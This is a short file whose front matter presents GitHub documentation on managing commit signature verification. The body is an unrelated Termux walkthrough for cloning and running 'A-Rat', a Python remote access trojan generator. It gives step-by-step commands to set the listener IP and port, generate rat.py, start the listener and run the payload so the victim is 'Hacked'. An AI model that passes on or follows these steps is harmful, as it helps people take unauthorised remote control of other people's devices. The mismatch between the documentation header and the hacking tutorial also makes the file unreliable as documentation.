---
title: Managing commit signature verification
intro: 'You can sign your work locally using GPG or S/MIME. {% data variables.product.product_name %} will verify these signatures so other people will know that your commits come from a trusted source.{% if currentVersion == "free-pro-team@latest" %} {% data variables.product.product_name %} will automatically sign commits you make using the {% data variables.product.product_name %} web interface.{% endif %}'
redirect_from:
  - /articles/generating-a-gpg-key/
  - /articles/signing-commits-with-gpg/
  - /articles/managing-commit-signature-verification
mapTopic: true
versions:
  free-pro-team: '*'
  enterprise-server: '*'
  github-ae: '*'
---

A-Rat = Remote access tool

we can generate python based rat

installation :

$ apt update 

$ apt upgrade

$ apt install git

$ apt install python2

$ apt install python

$ git clone https://github.com/Xi4u7/A-Rat

$ cd A-Rat

$ chmod +x *

usage :

$ python2 A-Rat.py

$ help

$ set host 127.0.0.1 [your ip]

$ set port 1337

$ set output /$HOME/rat.py

$ generate

It generates rat.py in termux home directory

Open termux new session 

type $ ls

here you get that rat.py 

go to again A-Rat means privious session of termux

Type run to start exploit.

$ run

and then open new session and run rat like this

$ python rat.py

and come back to A-Rat session 

Now its connected to that rat. means Hacked.

press control + c to stop.
